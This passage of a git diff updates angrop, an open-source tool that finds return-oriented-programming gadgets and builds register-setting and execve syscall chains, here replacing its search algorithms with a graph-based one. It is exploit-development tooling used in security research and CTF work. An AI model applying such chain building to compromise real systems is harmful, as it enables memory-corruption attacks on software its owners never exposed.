self._can_set_reg_with_bits(dst, max_bits): + unique_chains = sorted(all_chains[max_bits], key=chain_sc)[:5] + shorter_chains = [] + if dst in shortest: + for bits in all_chains: + shorter_chains += sorted(all_chains[bits], key=chain_sc)[:5] + shorter_chains = sorted(shorter_chains, key=chain_sc)[:5] + shorter_chains = [c for c in shorter_chains if chain_sc(c) < shortest[dst]] + + # take the first normalized unique_chain + for c in unique_chains: + try: + gadgets = self._expand_ropblocks(c) + c = self._build_reg_setting_chain(gadgets, {}) + c = RopBlock.from_chain(c) + rop_blocks.append(c) + break + except RopException: + pass + + # take the first normalized shorter_chain + for c in shorter_chains: + try: + gadgets = self._expand_ropblocks(c) + c = self._build_reg_setting_chain(gadgets, {}) + c = RopBlock.from_chain(c) + if dst not in shortest or c.stack_change < shortest[dst]: + shortest[dst] = c.stack_change + rop_blocks.append(c) + break + except RopException: + pass + return rop_blocks + + def _optimize_with_gadgets(self): + new_blocks = set() + shortest = {x:y[0] for x,y in self._reg_setting_dict.items() if y} + arch_bytes = self.project.arch.bytes + for gadget in itertools.chain(self._reg_setting_gadgets, self.chain_builder._reg_mover._reg_moving_gadgets): + if gadget.self_contained and not gadget.has_symbolic_access(): continue - if max_stack_change is not None and data[regs][1] > max_stack_change: + # check whether it introduces new capabilities + rb = None + new_pops = {x for x in gadget.popped_regs if not self._reg_setting_dict[x]} + new_moves = {x for x in gadget.reg_moves if not self._reg_setting_dict[x.to_reg] and \ + self._reg_setting_dict[x.from_reg]} + if new_pops or new_moves: + if new_moves: + for new_move in new_moves: + rb = self._normalize_for_move(gadget, new_move) + if rb is None: + continue + if new_move.to_reg in rb.popped_regs: + new_blocks.add(rb) + reg = new_move.to_reg + if reg not in shortest or rb.stack_change < shortest[reg].stack_change: + shortest[reg] = rb + else: + l.warning("normalizing \n%s does not yield any wanted new reg setting capability: %s", + rb.dstr(), + new_move.to_reg) + else: + rb = self.normalize_gadget(gadget, post_preserve=new_pops) + if rb is None: + continue + if rb.popped_regs.intersection(new_pops): + new_blocks.add(rb) + for reg in new_pops: + if reg not in shortest or rb.stack_change < shortest[reg].stack_change: + shortest[reg] = rb + else: + l.warning("normalizing \n%s does not yield any wanted new reg setting capability: %s", + rb.dstr(), + new_pops) + continue + + # this means we tried to normalize the gadget but failed, + # so don't try to do it again + if any(reg not in shortest for reg in gadget.popped_regs): continue - for g in gadgets: - # ignore gadgets which don't have a positive stack change - if g.stack_change <= 0: + # check whether it shortens any chains + better = False + for reg in gadget.popped_regs: + # it is unlikely we can use one more gadget to normalize it + # usually it takes two (pop; ret), so account for it by - arch_ bytes + if reg not in shortest or gadget.stack_change < shortest[reg].stack_change - arch_bytes: + # normalizing jmp_mem gadgets use a ton of gadgets, no need to even try + if gadget.transit_type == 'jmp_mem': + continue + if gadget.transit_type == 'pop_pc': + better = True + break + if gadget.transit_type == 'jmp_reg': + if gadget.pc_reg not in shortest: + continue + tmp = shortest[gadget.pc_reg] + if gadget.stack_change + tmp.stack_change < shortest[reg].stack_change: + better = True + break + if better: + if rb is None: + rb = self.normalize_gadget(gadget) + if not rb: continue + for reg in rb.popped_regs: + if reg not in shortest or rb.stack_change < shortest[reg].stack_change: + shortest[reg] = rb + new_blocks.add(rb) + return new_blocks - # ignore gadgets that set any of our preserved registers - if g.changed_regs.intersection(preserve_regs): - continue + def optimize(self, processes): + # TODO: make it multiprocessing - stack_change = data[regs][1] - new_stack_change = stack_change + g.stack_change - # if its longer than the best ignore - if new_stack_change >= best_stack_change: - continue - # ignore if we only change controlled regs - start_regs = set(regs) - if g.changed_regs.issubset(start_regs - data[regs][3]): - continue + # now we have a functional RegSetter, check whether we can do better + res = False - end_regs, partial_regs = self._get_updated_controlled_regs(g, regs, data[regs], partial_controllers, - modifiable_memory_range) + # first, see whether we can use reg_mover to set registers + rop_blocks = self._optimize_with_reg_moves() + self._insert_to_reg_dict(rop_blocks) + res |= bool(rop_blocks) - # ignore the gadget if does not provide us new controlled registers - end_reg_tuple = tuple(sorted(end_regs)) - npartial = len(partial_regs) - if len(end_regs - start_regs) == 0: - continue + # second, see whether we can use non-self-contained gadgets to set registers + new_blocks = self._optimize_with_gadgets() + self._insert_to_reg_dict(new_blocks) + res |= bool(new_blocks) - # if we havent seen that tuple before, or payload is shorter or less partially controlled regs. - if end_reg_tuple in data: # we have seen the tuple before - end_data = data.get(end_reg_tuple, None) - # payload is longer or contains more partially controlled regs - if not (new_stack_change < end_data[1] and npartial <= len(end_data[3])): - continue - if npartial >= len(end_data[3]): - continue + return res - # now make sure the chain does provide what it claims to provide - chain = self._tuple_to_gadgets(data, regs) + [g] - if not self._verify_chain(chain, end_regs): - continue + #### The Graph Search Algorithm #### + def _reduce_graph(self, graph, regs): # pylint: disable=no-self-use + """ + TODO: maybe make the reduction smarter instead of just 5 gadgets each edge + """ + regs = set(regs) + def giga_graph_gadget_compare(g1, g2): + if g1.stack_change < g2.stack_change: + return -1 + if g1.stack_change > g2.stack_change: + return 1 + side_effect1 = len(g1.changed_regs - regs) + side_effect2 = len(g2.changed_regs - regs) + if side_effect1 < side_effect2: + return -1 + if side_effect1 > side_effect2: + return 1 + return 0 + + for edge in graph.edges: + objects = graph.get_edge_data(*edge)['objects'] + objects = sorted(objects, key=cmp_to_key(giga_graph_gadget_compare))[:5] + graph.get_edge_data(*edge)['objects'] = objects + + def find_candidate_chains_giga_graph_search(self, + modifiable_memory_range, + registers, + preserve_regs, + warn) -> list[list[RopGadget|RopBlock]]: + if preserve_regs is None: + preserve_regs = set() + else: + preserve_regs = preserve_regs.copy() - # it improves the graph so add it - data[end_reg_tuple] = (regs, new_stack_change, g, partial_regs) - heapq.heappush(to_process, (new_stack_change, end_reg_tuple)) + registers = registers.copy() - # update the result if we find a better chain - if search_regs.issubset(end_regs) and new_stack_change < best_stack_change: - best_stack_change = new_stack_change - best_reg_tuple = end_reg_tuple + # handle hard registers + gadgets = self._find_relevant_gadgets(allow_mem_access=modifiable_memory_range is not None, **registers) + hard_chain = self._handle_hard_regs(gadgets, registers, preserve_regs) + if not registers: + return [hard_chain] - # if the best_reg_tuple is None then we failed to set the desired registers :( - if best_reg_tuple is None: - return None, None, data + # now do the giga graph search + regs = sorted(list(registers.keys())) + # build the target pops + bit_map = {} + for reg, val in registers.items(): + if self.project.arch.bits == 32 or val.symbolic: + bits = self.project.arch.bits + else: + if (val.concreted >> 32) == 0: + bits = 32 + else: + bits = 64 + bit_map[reg] = bits + + graph = nx.DiGraph() + + # add all the nodes. here, each node represents a state where the corresponding register + # is correctly set to the target value + nodes = list(itertools.product((True, False), repeat=len(regs))) + graph.add_nodes_from(nodes) + + def add_edge(src, dst, obj): + assert type(obj) is not list + if graph.has_edge(src, dst): + objects = graph.get_edge_data(src, dst)['objects'] + if obj in objects: + return + objects.add(obj) + else: + graph.add_edge(src, dst, objects={obj}) - gadgets = self._tuple_to_gadgets(data, best_reg_tuple) - return gadgets, best_stack_change, data + def get_dst_node(src, reg_list, clobbered_regs): + dst = list(src) + for reg in reg_list: + if reg not in regs: + continue + idx = regs.index(reg) + dst[idx] = True + for reg in clobbered_regs: + if reg not in regs: + continue + idx = regs.index(reg) + dst[idx] = False + return tuple(dst) + + def can_set_regs(g): + # ofc pops + reg_set = set(pop.reg for pop in g.reg_pops if pop.reg not in bit_map or pop.bits >= bit_map[pop.reg]) + # if concrete values happen to match + for reg in regs: + if registers[reg].symbolic: + continue + if reg in g.concrete_regs and g.concrete_regs[reg] == registers[reg].concreted: + reg_set.add(reg) + return reg_set - def _get_sufficient_partial_controllers(self, registers): - sufficient_partial_controllers = defaultdict(set) - for g in self._reg_setting_gadgets: - for reg in g.changed_regs: - if reg in registers: - if self._check_if_sufficient_partial_control(g, reg, registers[reg]): - sufficient_partial_controllers[reg].add(g) - return sufficient_partial_controllers + # add edges for pops and concrete values + total_reg_set = set() + for g in gadgets: + if isinstance(g, RopGadget) and not g.self_contained: + continue + reg_set = can_set_regs(g) + for unique_reg_set in list(itertools.product(*g.pop_equal_set)): + unique_reg_set = set(unique_reg_set) + unique_reg_set = unique_reg_set.intersection(reg_set) + clobbered_regs = g.changed_regs - unique_reg_set + # don't add the edge if changes registers that we want to preserve + if g.changed_regs.intersection(preserve_regs): + continue + total_reg_set.update(unique_reg_set) + for n in nodes: + src_node = n + dst_node = get_dst_node(n, unique_reg_set, clobbered_regs) + if src_node == dst_node: + continue + # greedy algorithm: only add edges that transit to an at least equally good node + src_cnt = len([x for x in src_node if x is True]) + dst_cnt = len([x for x in dst_node if x is True]) + if dst_cnt >= src_cnt: + add_edge(src_node, dst_node, g) + + # bad, we can't set all registers, no need to try + to_set_reg_set = set(registers.keys()) + if to_set_reg_set - total_reg_set: + if warn: + l.warning("fail to cover all registers using giga_graph_search!") + l.warning("register covered: %s, registers to set: %s", total_reg_set, to_set_reg_set) + return [] - @staticmethod - def _get_updated_controlled_regs(gadget, regs, data_tuple, partial_controllers, modifiable_memory_range=None): - g = gadget - start_regs = set(regs) - partial_regs = data_tuple[3] - usable_regs = start_regs - partial_regs - end_regs = set(start_regs) - - # skip ones that change memory if no modifiable_memory_addr - if modifiable_memory_range is None and g.has_symbolic_access(): - return set(), set() - elif modifiable_memory_range is not None: - # check if we control all the memory reads/writes/changes - accesses = g.mem_changes + g.mem_reads + g.mem_writes - all_mem_accesses = [m for m in accesses if m.is_symbolic_access()] - mem_accesses_controlled = True - for m_access in all_mem_accesses: - for reg in m_access.addr_dependencies: - if reg not in usable_regs: - mem_accesses_controlled = False - usable_regs -= m_access.addr_dependencies - if not mem_accesses_controlled: - return set(), set() - - # analyze all registers that we control - for reg in g.changed_regs: - end_regs.discard(reg) - partial_regs.discard(reg) - - # for any reg that can be fully controlled check if we control its dependencies - for reg in g.reg_controllers.keys(): - has_deps = True - for dep in g.reg_dependencies[reg]: - if dep not in usable_regs: - has_deps = False - if has_deps: - for dep in g.reg_dependencies[reg]: - end_regs.discard(dep) - usable_regs.discard(dep) - end_regs.add(reg) - else: - end_regs.discard(reg) - - # for all the changed regs that we dont fully control, we see if the partial control is good enough - for reg in set(g.changed_regs) - set(g.reg_controllers.keys()): - if reg in partial_controllers and g in partial_controllers[reg]: - # partial control is good enough so now check if we control all the dependencies - if reg not in g.reg_dependencies or set(g.reg_dependencies[reg]).issubset(usable_regs): - # we control all the dependencies add it and remove them from the usable regs - partial_regs.add(reg) - end_regs.add(reg) - if reg in g.reg_dependencies: - usable_regs -= set(g.reg_dependencies[reg]) - end_regs -= set(g.reg_dependencies[reg]) - - for reg in g.popped_regs: - end_regs.add(reg) - - return end_regs, partial_regs - - def _check_if_sufficient_partial_control(self, gadget, reg, value): - # doesnt change it - if reg not in gadget.changed_regs: - return False - # can be controlled completely, not a partial control - if reg in gadget.reg_controllers or reg in gadget.popped_regs: - return False - # make sure the register doesnt depend on itself - if reg in gadget.reg_dependencies and reg in gadget.reg_dependencies[reg]: - return False + self._reduce_graph(graph, regs) - # set the register - state = rop_utils.make_symbolic_state(self.project, self.arch.reg_set) - state.registers.store(reg, 0) - state.regs.ip = gadget.addr - # store A's past the end of the stack - state.memory.store(state.regs.sp + gadget.stack_change, claripy.BVV(b"A"*0x100)) + # TODO: the ability to set a register using concrete_values and then move it to another + # currently, we don't have a testcase that needs this - succ = rop_utils.step_to_unconstrained_successor(project=self.project, state=state) - # successor - if succ.ip is succ.registers.load(reg): - return False + # now find all paths between the src and dst node + src = tuple([False] * len(regs)) + dst = tuple([True] * len(regs)) - if succ.solver.solution(succ.registers.load(reg), value): - # make sure wasnt a symbolic read - for var in succ.registers.load(reg).variables: - if "symbolic_read" in var: - return False - return True - return False + chains = [] # here, each "chain" is a list of gadgets + try: + paths = nx.all_simple_paths(graph, source=src, target=dst, cutoff=min(len(registers)+2, 6)) + for path in paths: + if hard_chain: + tmp = [[x] for x in hard_chain] + else: + tmp = [] + edges = zip(path, path[1:]) + for edge in edges: + objects = graph.get_edge_data(edge[0], edge[1])['objects'] + tmp.append(objects) + # for each path, take the shortest 5 chains + path_chains = itertools.product(*tmp) + path_chains = sorted(path_chains, key=lambda c: sum(g.stack_change for g in c))[:5] + chains += path_chains + chains = list(chains) + except nx.exception.NetworkXNoPath: # type: ignore + return [] - #### Chain Building Algorithm 2: pop-only BFS search #### + # then sort them by stack_change + chains = sorted(chains, key=lambda c: sum(g.stack_change for g in c)) + return chains def _find_relevant_gadgets(self, allow_mem_access=True, **registers): """ @@ -472,15 +549,18 @@ def _find_relevant_gadgets(self, allow_mem_access=True, **registers): gadgets = set() # this step will add crafted rop_blocks as well + # notice that this step only include rop_blocks that can + # POP the register for reg in registers: gadgets.update(self._reg_setting_dict[reg]) + # add all other gadgets that may be relevant, + # including gadgets that set concrete values for g in self._reg_setting_gadgets: - if not g.self_contained: - continue - if g.has_symbolic_access(): + if not allow_mem_access and g.has_symbolic_access(): continue - if not allow_mem_access and g.num_sym_mem_access: + # TODO: normalize these, use badbyte test as the testcase + if g.oop: continue for reg in registers: if reg in g.popped_regs: @@ -493,53 +573,47 @@ def _find_relevant_gadgets(self, allow_mem_access=True, **registers): gadgets.add(g) return gadgets - @staticmethod - def _find_concrete_chains(gadgets, registers): - chains = [] - for g in gadgets: - for reg, val in registers.items(): - if reg in g.concrete_regs and g.concrete_regs[reg] == val: - chains.append([g]) - return chains - - def find_candidate_chains_pop_only_bfs_search(self, gadgets, preserve_regs, **registers): - """ - 1. find gadgets that set concrete values to the target values, such as xor eax, eax to set eax to 0 - 2. find all pop only chains by BFS search - TODO: handle moves - """ - # get the list of regs that cannot be popped (call it hard_regs) + def _handle_hard_regs(self, gadgets, registers, preserve_regs) -> list[RopGadget|RopBlock]: # pylint: disable=unused-argument + # handle register set that contains bad byte (so it can't be popped) + # and cannot be directly set using concrete values hard_regs = [reg for reg, val in registers.items() if self._word_contain_badbyte(val)] if len(hard_regs) > 1: l.error("too many registers contain bad bytes! bail out! %s", registers) + raise RopException("too many registers contain bad bytes") + if not hard_regs: + return [] + if registers[hard_regs[0]].symbolic: return [] # if hard_regs exists, try to use concrete values to craft the value hard_chain = [] - if hard_regs and not registers[hard_regs[0]].symbolic: - reg = hard_regs[0] - val = registers[reg].concreted - key = (reg, val) - if key in self.hard_chain_cache: - hard_chain = self.hard_chain_cache[key] + reg = hard_regs[0] + val = registers[reg].concreted + key = (reg, val) + if key in self.hard_chain_cache: + hard_chain = self.hard_chain_cache[key] + else: + hard_chains = self._find_concrete_chains(gadgets, {reg: val}) + if hard_chains: + hard_chain = hard_chains[0] else: - hard_chains = self._find_concrete_chains(gadgets, {reg: val}) - if hard_chains: - hard_chain = hard_chains[0] - else: - hard_chain = self._find_add_chain(gadgets, reg, val) - if hard_chain: - self.hard_chain_cache[key] = hard_chain # we cache the result even if it fails - if not hard_chain: - l.error("Fail to set register: %s to: %#x", reg, val) - return [] - registers.pop(reg) - - preserve_regs.update(hard_regs) - # use the original pop techniques to set other registers - chains = self._recursively_find_chains(gadgets, hard_chain, preserve_regs, - set(registers.keys()), preserve_regs) - return self._sort_chains(chains) + hard_chain = self._find_add_chain(gadgets, reg, val) + if hard_chain: + self.hard_chain_cache[key] = hard_chain # we cache the result even if it fails + if not hard_chain: + l.error("Fail to set register: %s to: %#x", reg, val) + raise RopException("Fail to set hard registers") + registers.pop(reg) + return hard_chain + + @staticmethod + def _find_concrete_chains(gadgets, registers): + chains = [] + for g in gadgets: + for reg, val in registers.items(): + if reg in g.concrete_regs and g.concrete_regs[reg] == val: + chains.append([g]) + return chains def _find_add_chain(self, gadgets, reg, val): """ @@ -552,8 +626,7 @@ def _find_add_chain(self, gadgets, reg, val): for g1 in concrete_setter_gadgets: for g2 in delta_gadgets: try: - chain = self._build_reg_setting_chain([g1, g2], False, # pylint:disable=too-many-function-args - {reg: val}, g1.stack_change+g2.stack_change) + chain = self._build_reg_setting_chain([g1, g2], {reg: val}) state = chain.exec() bv = state.registers.load(reg) if bv.symbolic: @@ -564,187 +637,23 @@ def _find_add_chain(self, gadgets, reg, val): pass return None - def _recursively_find_chains(self, gadgets, chain, preserve_regs, todo_regs, hard_preserve_regs): - """ - preserve_regs: soft preservation, can be overwritten as long as it gets back to control - hard_preserve_regs: cannot touch these regs at all - """ - if not todo_regs: - return [chain] - - todo_list = [] - for g in gadgets: - set_regs = g.popped_regs.intersection(todo_regs) - if not set_regs: - continue - if g.changed_regs.intersection(hard_preserve_regs): - continue - clobbered_regs = g.changed_regs.intersection(preserve_regs) - if clobbered_regs - set_regs: - continue - new_preserve = preserve_regs.copy() - new_preserve.update(set_regs) - new_chain = chain.copy() - new_chain.append(g) - todo_list.append((new_chain, new_preserve, todo_regs-set_regs, hard_preserve_regs)) - - res = [] - for todo in todo_list: - res += self._recursively_find_chains(gadgets, *todo) - return res - - #### Chain Building Algorithm 3: RiscyROP's backwards search #### - - def find_candidate_chains_backwards_recursive_search( - self, - gadgets: Iterable[RopGadget], - registers: set[str], - current_chain: list[RopGadget], - preserve_regs: set[str], - modifiable_memory_range: tuple[int, int] | None, - visited: dict[tuple[str, ...], int], - max_length: int, - ) -> Iterator[list[RopGadget]]: - """Recursively build ROP chains starting from the end using the RiscyROP algorithm.""" - # Base case. - if not registers: - yield current_chain[::-1] - return - - if len(current_chain) >= max_length: - return - - # Stop if we've seen the same set of registers before to prevent infinite recursion. - reg_tuple = tuple(sorted(registers)) - if visited.get(reg_tuple, max_length) <= len(current_chain): - return - visited[reg_tuple] = len(current_chain) - - potential_next_gadgets = [] - - for gadget in gadgets: - if not gadget.changed_regs.isdisjoint(preserve_regs): - continue - # Skip gadgets with non-constant memory accesses if we don't have memory that can be safely accessed. - if modifiable_memory_range is None and gadget.has_symbolic_access(): - continue - remaining_regs = self._get_remaining_regs(gadget, registers) - if remaining_regs is None: - continue - potential_next_gadgets.append((gadget, remaining_regs)) - - # Sort gadgets by number of remaining registers, stack change, and instruction count - potential_next_gadgets.sort( - key=lambda g: ( - sum(self._reg_weights[reg] for reg in g[1]), - g[0].stack_change, - g[0].isn_count, - ) - ) - - for gadget, remaining_regs in potential_next_gadgets: - current_chain.append(gadget) - yield from self.find_candidate_chains_backwards_recursive_search( - gadgets, - remaining_regs, - current_chain, - preserve_regs, - modifiable_memory_range, - visited, - max_length, - ) - current_chain.pop() - - def _get_remaining_regs(self, gadget: RopGadget, registers: set[str]) -> set[str] | None: - """ - Get the registers that still need to be controlled after prepending a gadget. - - Returns None if this gadget cannot be used. - """ - # Check if the gadget sets any registers that we need. - if gadget.popped_regs.isdisjoint(registers) and not any( - reg_move.to_reg in registers and reg_move.bits == self.project.arch.bits - for reg_move in gadget.reg_moves - ): - return None - - remaining_regs = set() - stack_dependencies = set() - - for reg in registers: - if reg in gadget.popped_regs: - reg_vars = gadget.popped_reg_vars[reg] if reg in gadget.popped_reg_vars else set() - if not reg_vars.isdisjoint(stack_dependencies): - # Two registers are popped from the same location on the stack. - return None - stack_dependencies |= reg_vars - continue - new_reg = reg - for reg_move in gadget.reg_moves: - if reg_move.to_reg == reg: - if reg_move.bits != self.project.arch.bits: - # Register is only partially overwritten. - return None - new_reg = reg_move.from_reg - break - else: - # Check if the gadget changes the register in some other way. - if reg in gadget.changed_regs: - return None - if new_reg in remaining_regs: - # Conflict, can't put two different values in the same register. - return None - remaining_regs.add(new_reg) - - if gadget.transit_type == 'jmp_reg': - if gadget.pc_reg in remaining_regs: - return None - remaining_regs.add(gadget.pc_reg) - - if not gadget.constraint_regs.isdisjoint(remaining_regs): - return None - remaining_regs |= gadget.constraint_regs - - return remaining_regs - #### Gadget Filtering #### - def _filter_gadgets(self, gadgets): - """ - group gadgets by features and drop lesser groups - """ - # gadget grouping - d = defaultdict(list) - for g in gadgets: - key = (len(g.changed_regs), g.stack_change, g.num_sym_mem_access, g.isn_count) - d[key].append(g) - if len(d) == 0: - return set() - if len(d) == 1: - return {gadgets.pop()} - - # only keep the best groups - keys = set(d.keys()) - bests = set() - while keys: - k1 = keys.pop() - # check if nothing is better than k1 - for k2 in bests|keys: - # if k2 is better than k1 - if all(k2[i] <= k1[i] for i in range(4)): - break - else: - bests.add(k1) - - # turn groups back to gadgets - gadgets = set() - for key, val in d.items(): - if key not in bests: - continue - gadgets = gadgets.union(val) - return gadgets - - def _same_effect(self, g1, g2): + def _effect_tuple(self, g): + v1 = tuple(sorted(g.popped_regs)) + v2 = tuple(sorted(g.concrete_regs.items())) + v3 = [] + for x,y in g.reg_dependencies.items(): + v3.append((x, tuple(sorted(y)))) + v3 = tuple(sorted(v3)) + v4 = g.transit_type + return (v1, v2, v3, v4) + + def _comparison_tuple(self, g): + return (len(g.changed_regs-g.popped_regs), g.stack_change, g.num_sym_mem_access, + g.isn_count, int(g.has_conditional_branch is True)) + + def _same_effect(self, g1, g2): # pylint: disable=no-self-use if g1.popped_regs != g2.popped_regs: return False if g1.concrete_regs != g2.concrete_regs: @@ -753,8 +662,6 @@ def _same_effect(self, g1, g2): return False if g1.transit_type != g2.transit_type: return False - if g1.has_conditional_branch != g2.has_conditional_branch: - return False return True def filter_gadgets(self, gadgets): @@ -762,13 +669,37 @@ def filter_gadgets(self, gadgets): process gadgets based on their effects exclude gadgets that do symbolic memory access """ - bests = set() - gadgets = set(gadgets) - while gadgets: - g0 = gadgets.pop() - equal_class = {g for g in gadgets if self._same_effect(g0, g)} - equal_class.add(g0) - bests = bests.union(self._filter_gadgets(equal_class)) - - gadgets -= equal_class - return bests + gadgets = [g for g in gadgets if g.popped_regs or g.concrete_regs] + results = self._filter_gadgets(gadgets) + return results + + #### Main Entrance #### + def run(self, modifiable_memory_range=None, preserve_regs=None, warn=True, **registers): + if len(registers) == 0: + return RopChain(self.project, self, badbytes=self.badbytes) + + # sanity check + preserve_regs = set(preserve_regs) if preserve_regs else set() + unknown_regs = set(registers.keys()).union(preserve_regs) - set(self.arch.reg_list) + if unknown_regs: + raise RopException("unknown registers: %s" % unknown_regs) + + # cast values to RopValue + for x in registers: + registers[x] = rop_utils.cast_rop_value(registers[x], self.project) + + for gadgets in self.find_candidate_chains_giga_graph_search(modifiable_memory_range, + registers, + preserve_regs, + warn): + chain_str = "\n".join(g.dstr() for g in gadgets) + l.debug("building reg_setting chain with chain:\n%s", chain_str) + try: + gadgets = self._expand_ropblocks(gadgets) + chain = self._build_reg_setting_chain(gadgets, registers) + if self.verify(chain, preserve_regs, registers): + return chain + except (RopException, SimUnsatError): + pass + + raise RopException("Couldn't set registers :(") diff --git a/angrop/chain_builder/shifter.py b/angrop/chain_builder/shifter.py index 1ffc7793..7ab0dda9 100644 --- a/angrop/chain_builder/shifter.py +++ b/angrop/chain_builder/shifter.py @@ -1,9 +1,12 @@ import logging from collections import defaultdict +import claripy + from .. import rop_utils from .builder import Builder from ..rop_chain import RopChain +from ..rop_block import RopBlock from ..errors import RopException l = logging.getLogger(__name__) @@ -82,11 +85,17 @@ def shift(self, length, preserve_regs=None, next_pc_idx=-1): if g.pc_offset != next_pc_idx*arch_bytes: continue try: - chain = RopChain(self.project, self.chain_builder) + chain = RopBlock(self.project, self) + state = chain._blank_state chain.add_gadget(g) for idx in range(g_cnt): if idx != next_pc_idx: - chain.add_value(self._get_fill_val()) + tmp = claripy.BVS(f"symbolic_stack_{idx}", self.project.arch.bits) + state.memory.store(state.regs.sp+idx*arch_bytes+arch_bytes, tmp) + val = state.memory.load(state.regs.sp+idx*arch_bytes+arch_bytes, + self.project.arch.bytes, + endness=self.project.arch.memory_endness) + chain.add_value(val) else: next_pc_val = rop_utils.cast_rop_value( chain._blank_state.solver.BVS("next_pc", self.project.arch.bits), @@ -120,23 +129,13 @@ def retsled(self, size, preserve_regs=None): raise RopException(f"Failed to create a ret-sled sp for {size:#x} bytes while preserving {preserve_regs}") - def _same_effect(self, g1, g2): - if g1.stack_change != g2.stack_change: - return False - if g1.transit_type != g2.transit_type: - return False - if g1.pc_offset != g2.pc_offset: - return False - return True + def _effect_tuple(self, g): + v1 = g.stack_change + v2 = g.pc_offset + return (v1, v2) - def _better_than(self, g1, g2): - if g1.num_sym_mem_access > g2.num_sym_mem_access: - return False - if not g1.changed_regs.issubset(g2.changed_regs): - return False - if g1.isn_count > g2.isn_count: - return False - return True + def _comparison_tuple(self, g): + return (len(g.changed_regs), g.stack_change, rop_utils.transit_num(g), g.isn_count) def filter_gadgets(self, gadgets): """ diff --git a/angrop/chain_builder/sys_caller.py b/angrop/chain_builder/sys_caller.py index 7667a52b..48b3546c 100644 --- a/angrop/chain_builder/sys_caller.py +++ b/angrop/chain_builder/sys_caller.py @@ -56,7 +56,14 @@ def verify(chain, registers, preserve_regs): for reg in preserve_regs: if reg in registers: del registers[reg] - state = chain.sim_exec_til_syscall() + try: + state = chain.sim_exec_til_syscall() + except RuntimeError: + chain_str = chain.dstr() + l.exception("Somehow angrop thinks\n%s\ncan be used for syscall chain generation-1.\nregisters: %s", + chain_str, registers) + return False + if state is None: return False @@ -64,7 +71,7 @@ def verify(chain, registers, preserve_regs): bv = getattr(state.regs, reg) if (val.symbolic != bv.symbolic) or state.solver.eval(bv != val.data): chain_str = chain.dstr() - l.exception("Somehow angrop thinks\n%s\ncan be used for the chain generation-2.\nregisters: %s", + l.exception("Somehow angrop thinks\n%s\ncan be used for syscall chain generation-2.\nregisters: %s", chain_str, registers) return False @@ -86,24 +93,15 @@ def _try_invoke_execve(self, path_addr): ptr = nullptr try: - return self.do_syscall(execve_syscall, [path_addr, ptr, ptr], - use_partial_controllers=False, needs_return=False) - except RopException: - pass - - # Try to use partial controllers - l.warning("Trying to use partial controllers for syscall") - try: - return self.do_syscall(execve_syscall, [path_addr, 0, 0], - use_partial_controllers=True, needs_return=False) + return self.do_syscall(execve_syscall, [path_addr, ptr, ptr], needs_return=False) except RopException: pass raise RopException("Fail to invoke execve!") def execve(self, path=None, path_addr=None): - if "unix" not in self.project.loader.main_object.os.lower(): - raise RopException("unknown unix platform") + if self.project.simos.name != 'Linux': + raise RopException(f"{self.project.simos.name} is not supported!") if not self.syscall_gadgets: raise RopException("target does not contain syscall gadget!") @@ -170,7 +168,7 @@ def set_sysnum(g): def key_func(g): good_sets = set() for reg, val in g.prologue.concrete_regs.items(): - if target_regs[reg] == val: + if reg in target_regs and target_regs[reg] == val: good_sets.add(reg) return len(good_sets) gadgets = sorted(gadgets, reverse=True, key=key_func) diff --git a/angrop/gadget_finder/__init__.py b/angrop/gadget_finder/__init__.py index 6a7c0380..e9efed85 100644 --- a/angrop/gadget_finder/__init__.py +++ b/angrop/gadget_finder/__init__.py @@ -1,27 +1,30 @@ +import os import re +import time +import signal import logging -import itertools +import multiprocessing as mp from functools import partial -from multiprocessing import Pool import tqdm +import psutil from angr.errors import SimEngineError, SimMemoryError from angr.misc.loggers import CuteFormatter -from angr.analyses.bindiff import differing_constants -from angr.analyses.bindiff import UnmatchedStatementsException from . import gadget_analyzer from ..arch import get_arch -from ..errors import RopException from ..arch import ARM, X86, AMD64, AARCH64 l = logging.getLogger(__name__) logging.getLogger('pyvex.lifting').setLevel("ERROR") - +ANALYZE_GADGET_TIMEOUT = 3 _global_gadget_analyzer: gadget_analyzer.GadgetAnalyzer = None # type: ignore +_global_skip_cache = None +_global_cache = None +_global_init_rss = None # disable loggers in each worker def _disable_loggers(): @@ -32,15 +35,42 @@ def _disable_loggers(): # global initializer for multiprocessing def _set_global_gadget_analyzer(rop_gadget_analyzer): - global _global_gadget_analyzer # pylint: disable=global-statement + global _global_gadget_analyzer, _global_skip_cache, _global_cache, _global_init_rss # pylint: disable=global-statement _global_gadget_analyzer = rop_gadget_analyzer + _global_skip_cache = set() + _global_cache = {} _disable_loggers() + process = psutil.Process() + _global_init_rss = process.memory_info().rss + +def alarm_handler(signum, frame): # pylint: disable=unused-argument + l.warning("[angrop] worker_func2 times out, exit the worker process!") + os._exit(0) + +def worker_func1(cslice): + analyzer = _global_gadget_analyzer + res = list(GadgetFinder._addresses_from_slice(analyzer, cslice, _global_skip_cache, _global_cache, None)) + return (cslice[1]-cslice[0]+1, res) -def run_worker(addr, allow_cond_branch=None): - if allow_cond_branch is None: - res = _global_gadget_analyzer.analyze_gadget(addr) +def worker_func2(addr, cond_br=None): + analyzer = _global_gadget_analyzer + signal.signal(signal.SIGALRM, alarm_handler) + + signal.alarm(ANALYZE_GADGET_TIMEOUT) + if cond_br is None: + res = analyzer.analyze_gadget(addr) else: - res = _global_gadget_analyzer.analyze_gadget(addr, allow_conditional_branches=allow_cond_branch) + res = analyzer.analyze_gadget(addr, allow_conditional_branches=cond_br) + signal.alarm(0) + + if not res: + # HACK: we are seeing some very bad memory leak situation, restart the worker + process = psutil.Process() + rss = process.memory_info().rss + if rss - _global_init_rss > 500*1024*1024: + l.warning("[angrop] worker_func2 encounters memory leak, exit the worker process!") + os._exit(0) + if res is None: return [] if isinstance(res, list): @@ -52,7 +82,8 @@ class GadgetFinder: a class to find ROP gadgets """ def __init__(self, project, fast_mode=None, only_check_near_rets=True, max_block_size=None, - max_sym_mem_access=None, is_thumb=False, kernel_mode=False, stack_gsize=80): + max_sym_mem_access=None, is_thumb=False, kernel_mode=False, stack_gsize=80, + cond_br=False, max_bb_cnt=2): # configurations self.project = project self.fast_mode = fast_mode @@ -60,6 +91,8 @@ def __init__(self, project, fast_mode=None, only_check_near_rets=True, max_block self.only_check_near_rets = only_check_near_rets self.kernel_mode = kernel_mode self.stack_gsize = stack_gsize + self.cond_br = cond_br + self.max_bb_cnt = max_bb_cnt if only_check_near_rets and not isinstance(self.arch, (X86, AMD64, AARCH64)): l.warning("only_check_near_rets only makes sense for i386/amd64/aarch64, setting it to False") @@ -87,9 +120,10 @@ def __init__(self, project, fast_mode=None, only_check_near_rets=True, max_block logging.getLogger('angr.engines.vex.ccall').setLevel(logging.CRITICAL) 